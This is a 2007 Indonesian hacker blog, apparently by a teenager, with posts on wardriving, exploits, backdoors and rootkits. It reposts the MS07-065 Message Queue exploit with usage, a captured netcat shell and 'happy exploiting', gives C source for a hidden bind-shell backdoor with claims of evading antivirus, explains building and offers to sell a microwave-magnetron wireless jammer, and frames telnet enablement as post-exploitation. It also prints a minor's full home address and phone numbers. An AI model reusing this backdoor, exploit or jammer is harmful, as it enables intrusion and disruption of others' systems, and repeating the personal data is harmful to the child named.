Thursday, December 27, 2007

Hack 0x09 : Wardriving di Tengah Mataram Part 1

Oleh Dendi Suhubdy A.K.A Cron of NuLL

Hari ini gw nemenin bokap gw beli memory SO-DIMM untuk laptopnya. Kami membelinya di toko Medina Software, Mataram. Nah, sepulangnya dari sana, bokap mampir dulu ke UD. Prisma untuk fotokopi berkas-berkas untuk pekerjaannya.....dan gw harus melakukan pekerjaan yang paling gw ga suka : MENUNGGU!! Kebetulan, gw liat laptop nyokap nganggur, gw nyalain dan memutuskan untuk ngelakuin wardriving sambil menunggu bokap keluar dari tempat fotokopi.


Gw kaget sekali kalo ada 8 AP (infrastructure wirless networks) di tengah kota Mataram!!! Ternyata WiFi sudah menjamur dimana-mana!!! He...he...tetapi dengan semakin banyaknya wireless networks, berarti semakin banyak internet gratisan yang bisa kami dapatkan (^_^). Walaupun melanggar etika hacking (biasa topic kesukaannya si PIRUS sama AMORY), menembus jaringan wireless tanpa sepengetahuan orang, itu amat mengasikkan, apalagi kalo dapet jaringan yang bandwithnya besar (kya Dikpora-NTB di daerah kami)!!!

Kebetulan gw udah nginstall beberapa tool hacking di kompie bokap, walaupun ga lengkap-lengkap amat sih, antara lain Network Stumbler sama Metasploit Framework 3. Gw sebenarnya butuh beberapa tool lagi kya Kismet, Aircrack, dan Angry IP Scanner.....dan....ah tidak!!!!!!!....gw lupa lagi untuk membeli Wireless Injection Adapter....oh no......ga bisa crack jaringan wireless yang dilindungi enkripsi WEP (sebenarnya bisa sih tapi ampe botak nunggunya)....tp ah ga apa....gw masi bisa scanning APs yang ada di Mataram. Moga aja info ini berguna bagi hacker-hacker yang ada di Mataram atau di luar Jawa yang sedang di Mataram.........lumayan klo ga punya uang untuk internetan...bisa langsung ngenet di tengah jalan...hahahahaha......

Ok, wardriving dimulai. Gw mulai jalanin Network Stumbler di depan tempet fotokopi itu dan inilah hasilnya.

Ini adalah grafik signal dari AP warnet 5jari (kebetulan letaknya sekitar 15 m dari tempat saya wardriving).....

Ini adalah grafik sinyal Wifi dari amikom Mataram......

Ini adalah grafik sinyal Wifi dari Cakrawala Net........

Ini adalah signal dari AP Omni-Lombok2.....

Ini adalah sinyal dari AP Grid-Lombok3.......kami mendapati bahwa sinyal ini paling tinggi di antara semua AP yang ada di Mataram. Kami tidak tahu letak pasti dari AP yang memancarkan sinyal Grid-Lombok3, tapi yang jelas sumber sinyalnya deket dengan sekolah kami.

Ini adalah sinyal dari wireless network yang dimiliki oleh Dikpora-NTB. Kebetulan sekali Dikpora-NTB terletak di sebelah sekolah kami, dan kami sudah menyelidiki bahwa kecepatan internetnya sangat cepat......

Nah, itulah sekilas dari wardriving pada hari ini. Bokap dah keluar dari tempet fotokopian, truz kita diajak ke Mall deh!! Kebetulan di Mall terdapat hotspot gratisan milik Telkom....ntar gw selidiki aaaahh......oh ya bro....tunggu aksi gw selanjutnya...ha..ha...ha (^_^)



Read more...

Wednesday, December 26, 2007

Hack 0x08 : Riskware Detected in Vista Transformation Pack 7

Berikut ini adalah screenshot dari pendeksian Pskill.exe oleh F-Secure Client Security pada saat Vista Transformation Pack 7 diinstall. Pada saat gw mengeksekusi Pskill lewat command line tertulis dibuat oleh System Internal. Penggunaan Pskill.exe oleh Vista Transformation Pack 7 masih belum jelas, tetapi sepertinya digunakan untuk mematikan process sistem.



Kenapa VTP perlu melakukan Terminate pada process sistem? Masi ingatkah pada HANDLE (lihat MSDN tentang HANDLE). Pada saat process masih berjalan, process masih memiliki HANDLE terhadap berbagai macam file. Kalau saja Anda melakukan deletion pada file yang diperlukan oleh process, maka sebuah kotak dialog warning akan keluar. Nah program seperti VTP yang akan merubah user interface windows tentu perlu untuk mengubah resource yang ada pada shell windows. Kalau VTP tidak menghentikan processnya, kemungkinan besar user interface tidak akan dapat diubah karena resource filenya tidak dapat di repace. Hal inilah yang mendasari kenapa VTP perlu menyertakan PSkill.exe di dalam executable packagenya.


Read more...

Tuesday, December 25, 2007

Rekomendasi Buku Komputer

Judul buku : Pemrograman Jaringan Internet dengan Visual C++
Pengarang : Agus Kurniawan
Penerbit : Elex Media Komputindo
Tahun Terbit : 2002

Banyak orang mengetahui internet, bahkan internet bukan merupakan teknologi baru, tetapi sudah berkembang menyeluruh di pelosok jagad raya ini. Dengan banyak kepentingan dan misi, internet melaju dengan cepatnya bagai air hujan dari langit. Situs-situs pun banyak bermunculan dengan menyajikan banyak ragam informasi dan diiringi dengan munculnya teknologi server, contohnya Internet Information Service (IIS) milik Microsoft dan Apache Web Server yang berbasis OpenSource.


Untuk melakukan koneksi melalui jaringan internet, diperlukan sustu media interface. Dengan media interface ini kita dapat melakukan koneksi dengan dunia luar. Buku ini membahas dengan mendetail tentang cara melakukan pemrograman pada jaringan internet. Adapun beberapa bahasan menarik yang terdapat pada buku ini adalah cara menciptakan program chatiing client dan server (contoh program client adalah Yahoo Mesengger dan servernya adalah Yahoo Server).

Bagi seorang hacker, internet sudah seperti surga. Siapapun yang menguasai pemrograman jaringan, dialah sang penguasa cyber world. Rata-rata semua program yang digunakan oleh para hacker bebasis jaringan internet, contohnya remote buffer overflow exploit (RPC DCOM /KAHT), bots (IRC bot, spybot), trojan (BO2K, sub7 legends, netbus), rootkits (Hacker Defender, FU, Vanquish), dan internet worms (Codered 1,2, Sasser, Blaster, MyDOOM, Melisa, I Love U). Buku ini membahas dasar-dasar pemrograman jaringan yang diperlukan untuk membuat berbagai malware di atas.

Trus kenapa harus menggunkan Visual C++? Tidak selamanya C++ harus digunakan, dengn bahasa pemrograman Assembly, Basic, Java, atau Pascal-pun, sebuah program berbasis jaringan internet dapat terbentuk. Namun penggunaan bahasa C++ dinilai OOP (pemrograman berorientasi objek) dan memiliki kekuatan yang sama seperti bahasa pendahulunya yaitu C (Linux dan Windows dibuat dari C karena portabilitas dan kecepatannya). Oh ya, tidak selamanya Visual C++ harus digunakan. Penggunaan DevCpp, MinGW Studios, atau GCC juga tidak apa-apa. Buku ini juga mencakup dasar-dasar algoritma yang diperlukan untuk membangun sebuah program berbasis jaringan, sehingga Anda tidak perlu khawatir dengan masalah lain compiler, lain source code.

Walaupun penuh dengan berbagai kelebihan, buku ini juga disertai beberapa kekurangan yaitu antara lain file source codenya sudah berada di dalam disket yang ter-embed dalam pembelian buku. Ini sangat disayangkan karena kapasitas disket yang teramat kecil, relatif terhadap CD ataupun DVD.

Penulis memberikan nilai 9 dari nilai sempurna 10 untuk buku ini. Buku ini adalah sebuah terobosan baru untuk literature pemrograman jaringan C++ yang berbasis jaringan internet (kebetulan gw suka banget sama C++…he….he…)



Read more...

BitDefender Beta Testing Winner

From: "Carmen MAIEREAN" <cmaierean@bitdefender.com>To: "'Daps Keren'" <dapskeren@yahoo.com>Subject: RE: BitDefender v10 Beta campaignDate: Tue, 22 Aug 2006 11:56:28 +0300





Dear Dendi Suhubdy,

We are happy to have you in our Beta testing team. Your effort made a difference and helped us improve our product. Thanks for sending me the mailing details. We will contact you to inform you of the day when you should receive the prize. I expect it to be no later than the end of the following month.

Regards,
Carmen.


From: Daps Keren [mailto: dapskeren@yahoo.com ] Sent: 22 august 2006 01:12To: Carmen MAIEREANSubject: Re: BitDefender v10 Beta campaign

Dear Carmen Maierean,
Thank you for listing me as a trusty beta tester. I am really proud to be one of the winners for BitDefender Beta 10 Internet Security Campaign. I didn't expect to win, because I haven't got any experience in computer security yet and there are many computer analyst and security expert following the same contest. So I though my probablity to win is little.
My focus to follow the contest is to make BitDefender even better. We all hope that BitDefender becomes the best internet securer for computer home users. I will always be BitDefender Beta Testers Team from now on.
However, I am just a 14 year old teenager who is really interested in computer programming (especially Visual C++ 2005). I live in Indonesia and my postal and home address is:
Dendi Anugerah Pratama SuhubdyJl. Irian no. 5 Perumahan Gunungsari Indah Mataram NTB Indonesia 83351Telp. +62-370-633412HP. +628123707342
Thank you for your kind information. I look forward to hearing from you soon as possible.
"Viva Bidefender"
Best regards,

Dendi A.P. Suhubdy


Carmen MAIEREAN <cmaierean@bitdefender.com> wrote:


Hello,
We are proud to inform you that you are one of the BitDefender v10 Betacampaign winners. Your input has been of great value and helped us build abetter product. We hope to have you as part of our Beta testing teams fromnow on. Thanks for helping us!
Your efforts have landed you with one of the prizes, consisting in an iPOD Shuffle and a BitDefender Internet Security v10 license which willbe sent to you via courier.
Please provide us with a valid mailing adress, so we can ship your prize toyou.
Kind regards,Carmen MAIEREAN

Product Manager - BitDefender Desktop Products

SOFTWINData Security Division

e-mail: cmaierean@bitdefender.com

phone: +40 (21) 233 07 80 130

fax: +40 (21) 233.07.63Bucharest ,

ROMANIA

http://www.bitdefender.com/

http://www.softwin.ro/


Read more...

Monday, December 24, 2007

Hack 0x07 : Melihat Sekilas Windows DDK

Oleh Dendi Suhubdy A.K.A Cron of NuLL

Windows DDK adalah development enviroment untuk membuat device driver bagi sistem operasi windows......Kalau Anda kepengen jadi rootkit developer, adalah keharusan untuk memiliki WinDDK. Nah kalau Anda belum pernah melihat WinDDK....selamat melihat deh......




Ini adalah screenshot pada saat gw sedang mencompile atau build sebuah rootkit yang cantik.



Read more...

Hack 0x06 : Random Number Generator

Oleh Dendi Suhubdy A.K.A Cron of NuLL

Random number generator (RNG) atau pembangkit bilangan acak, kerap kali diimplementasikan di dalam berbagai algoritma kriptografi. Contohnya saja pada algoritma kriptografi Deffie-Helman yang memerlukan bilangan prima sebagai input. Nah, cara yang paling efektif untuk mendapatkan suatu bilangan prima acak adalah dengan cara melakukan pembangkitan bilangan acak kemudian mengetes apakah bilangan yang dibangkitkan itu berupa bilangan acak atau tidak. Sekarang pertanyaannya adalah……apa algoritma untuk melakukan pembangkitan bilangan acak tersebut?


Yupzzz, Anda dapat menggunakan rand() atau Math.Random() pada C++ atau System.Random pada C# (red. C sharp) atau java.util.Random pada Java. Namun, jika Anda memeriksa algoritma yang digunakan oleh fungsi-fungsi tersebut, Anda akan menemukan bahwa itu adalah RNG yang lambat…..masih ada cara untuk mempercepatnya beberapa CPU clock cylces…lagipula baru-baru ini ditemukan security flaw pada fungsi rand() sehingga bilangan acak ini dapat dibangkitkan kembali (artinya tidak benar-benar acak) dan ini merupakan ancaman yang serius untuk dunia kriptografi.

Kalau Anda adalah orang yang haus akan ilmu hacking dan matematika diskrit…….inilah jawabannya……..

Algortima pertama adalah R250/5231 yang diciptakan oleh Kirkpatrick dan Stoll yang dipublikasikan di A Very Fast Shift-Register Sequence Random Number Generator, J. Computational Physics, vol 40, pp. 517-526.

Algoritma yang kedua adalah Mersenne Twister yang diciptakan pada tahun 1996 oleh Matsumora dan Nishimura.

Source codenya dapat di compile dengan gcc v3.3…….atau kalau Anda benar-benar kreatif, ubahlah source code ini sesuai dengan keinginan Anda……tetapi jangan lupa pada kontribusi orang-orang yang menciptakan algoritma ini. Upzzzzzzzz, gw lupa kalau source code java dan C#nya juga ada. Berikut linknya dari semua source codenya.



Read more...

Friday, December 21, 2007

Hack 0x05 : New Exploit (22-12-2007) for Windows 2000

Oleh Dendi Suhubdy A.K.A Cron of NuLL


******** Microsoft Message Queue POC exploit ( MS07-065 )**********

Mario Ballano - (mballano~gmail.com) - http://www.48bits.com

Andres Tarasco - (atarasco~gmail.com) - http://www.tarasco.org

*********************************************************************

* Original Advisory:

http://www.zerodayinitiative.com/advisories/ZDI-07-076.html

* Microsoft Bulletin :

http://www.microsoft.com/technet/security/bulletin/ms07-065.mspx

* CVE Code: CVE-2007-3039

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3039

* Timeline:

No naked news this time, just rum and whiskey

* Additional information:

From Microsoft support http://support.microsoft.com/?id=178517 : RPC dynamic RPC ports for MQ 2101,2103,2105

HSC of course http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_msmq.html

Dave´s unmidl http://www.immunitysec.com/resources-freesoftware.shtml

* How to compile: Call your favorite SetEnv.Cmd from microsoft SDK and then exec nmake.

* Note: There are several rpc ports to trigger the overflow. If you hit a system then

looks like you´ll need to send the exploit twice or specify another port (-p ) to exploit it again.

There is a chance that offsets are invalid for windows 2000 server (only spanish win2k advanced server was tested)


Adjust them if needed.

Usage:

C:\Programación\MessageQueue>MessageQueue.exe

--------------------------------------------------------------

Microsoft MessageQueue local & remote RPC Exploit code

Exploit code by Andres Tarasco & Mario Ballano

Tested against Windows 2000 Advanced server SP4

--------------------------------------------------------------

Usage (cara penggunaan exploit)

MessageQueue.exe -h hostname [-d Dnssuffix] [-n netbiosname] [-p port] [-t lang]

Targets:

0 (0x6bad469b) - Windows 2000 Advanced server English (default - untested)

1 (0x6b9d469b) - Windows 2000 Advanced server Spanish

2 (0x41414141) - Windows 2000 Advanced server crash

C:\Programación\\MessageQueue>MessageQueue.exe -h 192.168.1.39

--------------------------------------------------------------

Microsoft MessageQueue local & remote RPC Exploit code

Exploit code by Andres Tarasco & Mario Ballano

Tested against Windows 2000 Advanced server SP4

--------------------------------------------------------------

//contoh screen display pada saat exploit diluncurkan......

[+] Binding to ncacn_ip_tcp:192.168.1.39

[+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0

[+] RPC binding string: ncalrpc:[LRPC00000414.00000001]

[+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0

[+] RPC binding string: ncalrpc:[QMsvc$testserver]

[+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0

[+] RPC binding string: ncalrpc:[QmReplService]

[+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0

[+] RPC binding string: ncalrpc:[QMMgmtFacility$testserver]

[+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0

[+] RPC binding string: ncacn_ip_tcp:192.168.1.39[1222]

[+] Using gathered netbios name: testserver

[+] Dynamic MessageQueue rpc port found (1222)

[+] Connecting to fdb3a030-065f-11d1-bb9b-00a024ea5525@ncacn_ip_tcp:192.168.1.39[1222]

[+] RpcBindingFromStringBinding success

[+] Trying to fingerprint target...

[+] Fqdn name obtained from netbios packet: testserver.local

[+] Remote OS Fingerprint (05.00)

[+] Remote Host identified as Windows 2000

[+] Sending POC Exploit code to QMCreateObjectInternal()

[+] Try to connect to remote host at port 4444 for a shell

C:\>nc 192.168.1.39 4444

Microsoft Windows 2000 [Versión 5.00.2195]

(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32> ///BRAVOOOOOOOOO, THE VIESTA BEGINS HERE....segala kemungkinan serangan selalu terbuka!!!!!!!!!!!

Special thanks to Anres Tarasco and Mario Ballano.........

Source code here ok........

http://www.milw0rm.com/sploits/2007-MessageQueue.zip

Kalau Anda memiliki kemampuan programming, ada baiknya Anda mencoba menganalisa source codenya, tapi kalau tidak dan Anda ingin sekali mencoba mengusai kompie Win2k, Anda tinggal mengcompilenya dengan masuk command line trus ke directory active source code, ketikkan “nmake” diikuti dengan pencetan enter (he…he..=)))...…jangan lupa Anda harus menginstall Visual C++ untuk mengcompile codenya....

Cheers and happy exploiting.........



Read more...

Ga Sempet Ngupdate Blog

He…he…..teman-teman pengunjung blog yang saya cintai (eisleh………). Selama beberapa hari xphreak team ga sempet ngupdate blog ini karena kami sedang ujian semester ganjil di sekolah kami, yaitu SMA Negeri 1 Mataram.

Maka dari itu, sebagai kompensasi, kami akan berusaha mengupdate blog ini dengan artikel-artikel terbaru yang tentunya HOT untuk dibaca.

Trims y.....

Cron of NuLL

xPhreak Technologies


Read more...

Saturday, December 8, 2007

Hack 0x04 : Spawn CmdShell (Teknik Bind)

Oleh Dendi Suhubdy A.K.A Cron of NuLL

Pada kesempatan ini saya akan membahas suatu teknik pembuatan backdoor menggunakan teknik cmd spawn. Nah pasti pembaca bertanya-tanya, apasih istimewanya teknik cmd spawn ini? Udah ada ribuan Remote Administration Tools yang jauh lebih keren, kayak Back Orifice 2000, Subseven, Amitis, Netbus, dll (kalau namanya di daftar halaman ini tak cukup). Cukup dengan BO2K, kita bisa melakukan ribuan hal ke computer orang lain. Mulai dari hijack mouse dan keyboardnya, membuka semua file, mengutak-atik registry, mengendalikan process, live-keylog, bahkan chatting dengan victim juga ada. Nah alasan utama saya memakai spawn cmd shell adalah karena teknik ini begitu simple sehingga semua jenis vendor komputer security tak menaruh signature file khusus untuk mendeteksi jenis backdoor ini.


Saya telah melakukan test dengan backdoor ini beberapa jenis proteksi antivirus dan antispyware yang beredar selama ini, contohnya: McAfee Antivirus + Antispyware (Enterprise Security 8.5i), Norton Antivirus, Norman Virus Control, Avira (Antivir Personal Edition Classic), Kaspersky Internet Security, F-Secure Client Security, AVG Antivirus (Free, Personal, dan Enterprise).Oh ya, cmd spawn ini juga digunakan di dalam shellcode exploit

Teknik spawn cmdshell itu amat sangat simple. Backdoor ini hanya melakukan proses pembukaan koneksi (bind) pada port tertentu dan ketika ada koneksi yang masuk, maka cmd.exe dari computer remote dimiliki sepenuhnya oleh sang penyerang.

Saya menciptakan backdoor ini dengan bahasa C dan saya compile dengan compiler Visual C++ 6.0. Saya lebih menyukai memakai bahasa C daripada bahasa Basic karena ukuran maupun kecepatan executable menjadi lebih baik. Backdoor ini hanya berukuran 5.05 KB, sebelumnya ada optimalisasi berukuran 129 KB. Setelah optimalisasi oleh compiler dengan small executable maka backdoornya menjadi 29 KB. Setelah menambah beberapa baris kode lagi maka exenya jadi 5.05 KB (sebenarnya bila memakai assembly exe ini bisa kurang dari 1 KB). Akhirnya saya menambahkan kompresi UPX sehingga ukuran exe jadi lebih kecil lagi.

Ok bro, di bawah ini adalah source code dari program saya ini. Happy coding!!! Inget bro ini untuk 1 kali konek saja, tetapi jika mau digunakan untuk konek berkali-kali, masukkan subrutin accept() di dalam loop tak hingga (while 1) dan untuk proses send menggunakan _beginthread( ) atau AfxBeginThread( ).

======================================================================
spawn.h (precompiled header) -> berfungsi untuk memperkecil ukuran executable

#ifdef NDEBUG
#pragma optimize("gsy",on)
#pragma comment(linker,"/RELEASE")
#ifdef _MERGE_RDATA_
#pragma comment(linker,"/merge:.rdata=.data")
#endif // _MERGE_RDATA_
#pragma comment(linker,"/merge:.text=.data")
#pragma comment(linker,"/merge:.reloc=.data")
#if _MSC_VER >= 1000
#pragma comment(linker,"/FILEALIGN:0x200")
#endif // _MSC_VER >= 1000
#endif // NDEBUG
#pragma comment(linker,"/ENTRY:WinMain")
#pragma comment(linker,"/MERGE:.rdata=.data")
#pragma comment(linker,"/MERGE:.text=.data")
#pragma comment(lib,"msvcrt.lib")
#if (_MSC_VER < style="">
#pragma comment(linker,"/IGNORE:4078")
#pragma comment(linker,"/OPT:NOWIN98")
#endif
#define WIN32_LEAN_AND_MEAN

===========================spawn.c=====================================

#include

#pragma comment(linker,"/ENTRY:WinMain")
int WINAPI WinMain(HINSTANCE , HINSTANCE , LPSTR ,int )
{
STARTUPINFO si;
struct sockaddr_in sa;
PROCESS_INFORMATION pi;
int s
WSADATA HWSAdata;
WSAStartup(0x101, &HWSAdata);
s=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,0,0,0);
sa.sin_family = AF_INET;
sa.sin_port = 0x901F; // (USHORT)htons(8080);
sa.sin_addr.s_addr= 0x00; // htonl(INADDR_ANY);
bind(s, (struct sockaddr *) &sa, 16);
listen(s, 1);
s= accept(s,(struct sockaddr *)&sa,NULL);
si.cb = sizeof(si); // 0x44;
si.wShowWindow = SW_HIDE; // 0x00
si.dwFlags = STARTF_USESHOWWINDOW+STARTF_USESTDHANDLES; // 0x101
si.hStdInput = si.hStdOutput = si.hStdError = (void *) s;
si.lpDesktop = si.lpTitle = (char *) 0x0000;
si.lpReserved2 = NULL;
CreateProcess( NULL ,"cmd",NULL, NULL,TRUE, 0,NULL,NULL,(STARTUPINFO*)&si,π);
}
==============================================================


Read more...

Hack 0x03 : Melumpuhkan Jaringan Wireless LAN

Oleh Dendi Suhubdy A.K.A Cron of NuLL

Jaringan wireless LAN adalah jaringan LAN (Local Area Network) yang dibentuk oleh koneksi nirkabel (ya ialah…..namanya juga wireless bro J). Koneksi pada jaringan wireless LAN dibentuk oleh gelombang elektromagnetik yang membawa packet data biner (1 dan 0) dari server kepada client dan sebaliknya. Infrastruktur wireless LAN ditopang oleh AP (access point) yang bertugas membangkitkan gelombang elektromagnetik bagi server. Melalui cara inilah server dan client LAN dapat berkomunikasi satu sama lainnya.


FCC atau badan regulasi spektrum radio Amerika Serikat menetapkan spektrum radio bagi umum, yaitu untuk industri, sains, dan kesehatan atau lebih dikenal dengan Industrial, Scientific and Medical (ISM) band. Salah satunya adalah pada spektrum radio dengan frekuensi antara 2.400 GHz dan 2.499 GHz (gigahertz). Rentang ini dibagi lagi menjadi 14 channel bagi infrastruktur wireless. Berikut adalah tabel dari 14 channel tersebut.

Channel

Frekuensi (GHz)

Rentang (GHz)

1

2.412

2.401 – 2.432

2

2.417

2.406 – 2.428

3

2.422

2.411 – 2.433

4

2.427

2.416 – 2.438

5

2.432

2.421 – 2.443

6

2.437

2.426 – 2.448

7

2.442

2.431 – 2.453

8

2.447

2.436 – 2.458

9

2.452

2.441 – 2.463

10

2.457

2.446 – 2.468

11

2.462

2.451 – 2.473

12

2.467

2.456 – 2.478

13

2.472

2.461 – 2.483

14

2.484

2.473 – 2.495


Nah apa Anda bisa menemukan hal yang tersirat di dalam tabel tersebut? Hayo apa hayo????...............ketemu jawabannya ga???........ehm..........ya benar kalau Anda melihat dengan teliti rentang wireless di atas, Anda dapat melihat beberapa frekuensi yang saling tumpang tindih. Ini dapat menyebabkan gangguan yang berarti apabila Anda mengunakan infrastruktur wireless dengan channel yang berdekatan dengan infrastuktur wireless tetangga Anda. Siapkanlah pentungan untuk berjaga-jaga jika tetangga mengajak Anda berkelahi karena jaringan wirelessnya down karena jaringan wireless Anda J. Kalau Anda tidak mau cari gara-gara, konfigurasikan AP Anda untuk beroperasi pada channel 1, 6 atau 11. Itulah makanya Pak Menkominfo, Prof. Dr. Muhammad Nuh menyarankan kita agar menggunakan spektrum radio secara bijak......

Masi ingatkah teman-teman pada ocehan guru Fisika yang menjelaskan mengenai gelombang elektromagnetik? Ya, segala jenis gelombang dapat mengalami interferensi atau istilah kasarnya tabrakan akibat ada dua atau lebih gelombang yang memilki frekuensi yang sama. Nah lho..........jaringan wireless beroperasi pada frekuensi 2.4 GHz (inget ini untuk 802.11b saja, kalau 802.11a/g/n tidak menggunakan frekuensi ini).....aha....kalau gitu bisa dunkz jaringan wireless dilumpuhkan oleh sumber gelombang yang memilki frekuensi yang sama.... yups.....itu benar bro....inilah konsep melumpuhkan jaringan wireless....


Jaringan wireless bisa dilumpuhkan dengan suatu sumber gelombang dengan frekuensi sama yaitu 2.4 GHz tetapi dengan kekuatan yang lebih besar. Nah, kalau gitu sumber gelombangnya apa dunkz? HP Anda dapat menjadi alat yang cukup untuk melumpuhkan jaringan wireless yang besar....apalagi kalau jumlah HP yang menyala banyak.....analoginya seperti gelombang tsunami yang pecah karena gelombang-gelombang kecil tetapi berjumlah banyak atau istilahnya ripples.

Cara ini kurang efektif, apabila kalau Anda harus menyuruh semua teman Anda membawa HP ke jaringan target untuk dilumpuhkan (belum tentu semua teman Anda mau membawa HP....kecuali Anda mengancam akan berhenti memberikan setoran film **** kepada teman Anda J). Cara yang paling efektif adalah mengunakan pembangkit gelombang mikro....sekarang ini microwave dijual dengan harga yang terjangkau. Nah di dalam microwave ini disimpan suatu alat yang dinamakan magnetron atau kylstron. Dengan sedikit kemampuan ngerumus (he..he..fisika lagi), nyolder, dan teknik memasang baut.......Anda dapat membuat destruktor gelombang sederhana yang dapat menciptakan Denial of Service (DOS) bagi sebuah jaringan wireless. Bayangkan Anda mempunyai alat ini.....kalau Anda adalah tipe orang yang baik yang simpan di rumah aja sebagai pajangan...tetapi kalau Anda adalah tipe orang yang suka have fun dan ingin tahu, nyalakan alat ini di tempat dimana terdapat jaringan wireless....saya yakin administrator jaringan akan kebingungan mencari penyebab LAN yang ia kuasai, mati mendadak J.

Ingin memiliki alat ini? Buat aja ndiri...........kan cara buatnya gampang banget. Tetapi jika Anda kesulitan atau Anda tidak memiliki cukup waktu untuk membuat alat tersebut tetapi Anda betul-betul membutuhkannya (barangkali untuk penelitian jangan mikir yang negatif aja dunkz!!!!), Anda bisa memesannya di saya dengan harga yang terjangkau. Bagi yang berminat untuk tawaran ini kirmkan email ke th3d4rkLord [at] gmail.com. Sory kalau gue akhirnya jadi kya sales...he...he...



Read more...

Thursday, December 6, 2007

Hack 0x02: Konfigurasi Telnet Server pada Windows

Oleh Dendi Suhubdy A.K.A Cron of NuLL

Kemaren saya ditanya oleh salah seorang teman. Ia menanyakan bagaimana cara menyalakan telnet server pada komputernya (Windows bukan Linux, Unix, atau MacOS). Saya kira karena begitu mudahnya menyalakan telnet server, semua orang pasti bisa melakukannya. Nah, tulisan ini saya buat bagi teman-teman yang belum tahu bagaimana cara menyalakan atau mengkonfigurasikan telnet server pada komputer.



Sebelumnya apakah Anda tau apa kegunaan telnet server? Telnet server memungkinkan kita untuk mengendalikan komputer secara jarak jauh. Istilahnya telnet server adalah trojan server kecil yang terintegrasi bersama dengan sistem operasi. Keuntungan memakai telnet server adalah user interface yang ramah, yaitu Anda memberikan perintah jarak jauh (istilahnya remote) seolah-olah anda mengeksekusi perintah pada command line pada komputer Anda. Trus, kalau begitu apa kerugian dari penggunaan telnet server? Kerugiannya adalah penggunaan NTLM authentication tanpa enkripsi sehingga memudahkan pencurian password oleh sniffers. Kalau Anda adalah administrator sistem, saya sarankan Anda menggunakan SSH pada Linux daripada Telnet Server untuk mengkonfigurasikan sistem Anda.

Ada berbagai cara untuk menyalakan telnet server, tapi yang paling mudah dan paling sering digunakan adalah melalui command line.

1.Klik Start->Run.


2.Ketik ”cmd” kemudian tekan enter.
3.Setelah muncul kotak item yang berisikan hanya teks, ketikan perintah berikut secara berurutan.

4. ”sc config TlntSvr start= auto” (perintah ini berfungsi untuk mengatur agar Telnet Server nyala pada saat Windows menyala.
5. ”sc start Tlntsvr” (perintah ini berfungsi untuk mengatur agar Telnet Server nyala)

Udah gitu aja.........mudah bukan.........

Setelah saya memberitahukan teman saya mengenai cara ini, dia kemudian balik bertanya ”adakah cara untuk menyalakan telnet server tanpa akses fisik ke komputer itu?”. Saya bilang ada, yaitu melalui attack vector. Hacker sering menyebutnya begitu sebab attack vector adalah cara-cara untuk meraih hak (priviledge) Administrator atau System. Ada beberapa attack vector antara lain exploit, worm, atau trojan lain.

Attack vector yang paling mudah adalah exploit. Kita tinggal mengetahui apakah komputer target adalah komputer yang memiliki kelemahan tertentu (istilahnya vulnerable system contohnya RPC_DCOM exploit yang meyebabkan worm blaster menjadi sejarah) trus melakukan launch exploit. Ada beberapa sumber source code exploit atau exploit database antara lain adalah milw0rm.com dan metasploit.com. Kalau Anda tidak mau repot-repot mempelajari teknik exploit dan hanya ingin mengeksploitasi komputer orang, saya sarankan Anda untuk mendownload Metasploit Framework (links situsnya ada di situs sini).
Setelah Anda memperoleh akses ke komputer target melalui exploit, Anda bisa melakukan berbagai hal contohnya mengkopi file, mematikan komputer (kecuali Anda tidak memperoleh akses user Administrator), membuat user baru, bahkan memformat semua harddisk dari komputer target.

Kesimpulannya bahwa telnet server adalah fitur yang memudahkan administrator untuk melakukan konfigurasikan komputer secara jarak jauh atau remote.


Read more...

Wednesday, December 5, 2007

Hack 0x01 : Rootkit Keep Stealth Keep Alive

By Dendi Suhubdy A.K.A Cron of NuLL


"Hanya dengan rootkit, seluruh kekuatan OS ada di dalam genggaman ANDA!"


Rootkit adalah suatu program komputer yang dapat mempertahankan existensinya (red. keep alive) tanpa ketahuan oleh pengguna komputer, program keamanan maupun operation system (/red. Keep stealth). Nah membuat sebuah rootkit adalah sebuah seni coding advance yang menjadi impian semua hacker di dunia. Mengapa? Melalui sebuah rootkit, seorang hacker dapat menguasai sebuah machine/komputer/system selama bertahun-tahun. Dan melalui sebuah rookit, worm Morris yang sudah basi dapat menjadi CodeRed yang menakutkan. Dalam experimen di dalam forum BlackHat, sebuah worm komputer dipadu dengan teknologi rootkit FU. Rootkit ini dapat menyembunyikan process dari sistem dengan teknik coding yang nyaris sempurna sehingga worm dapat melumpuhkan sistem tanpa ketahuan oleh antivirus maupun pengguna. Kesimpulan terakhir dari forum itu yaitu betapa mengerikannya masa depan keamanan internet kalau teknologi rootkit terus dikembangkan.

Arsitektur rootkit itu gampang-gampang susah. Gampang karena hanya terdiri dari sebuah .exe (executable windows) dan .sys (biasa dinamakan dengan rootkit driver). Susah karena pembuat rootkit harus pintar-pintar mengatur hubungan antara .exe dan .sys. Hubungan ini dinamakan dengan user-kernel mode connection interface. Hubungan inilah yang menentukan bagaimana packet data TCP/IP/ UDP/RAW dari dunia luar (internet)
berkoneksi dengan kernel sistem operasi dan hardware komputer. Mengapa sebuat rootkit harus terbuat dari .exe dan .sys? Kenapa ngak hanya .exe saja? Rootkit pada dasarnya mempunyai dua fungsi utama. Fungsi pertama adalah menerima perintah remote dari hacker dan fungsi yang kedua adalah menyembunyikan kehadirannya dalam sistem. Fungsi yang pertama ditangani oleh .exe (executable) dan fungsi yang kedua ditangani oleh .sys
(rootkit driver). Kedua komponen ini saling mendukung satu-sama lain dan membuat sang hacker dapat menguasai sebuah sistem kopmuter secara menyeluruh.

Bagaimana cara membuat sebuah rootkit? Persis sama ketika anda ingin membuat jajan, anda harus menyiapkan alat dan bahan terlebih dahulu. Alat-alatnya adalah: Windows Driver Kit (WDK) atau Device Driver Kit (DDK), sebuah compiler C/C++ atau Pascal (penulis merekomendasikan Microsoft Visual C++ 6 atau Delphi 7), debugger (penulis menggunakan OllyDbg), dan debug viewer (penulis menggunakan DbgView buatan Mark
Russinovich dari www.sysinternals.com).
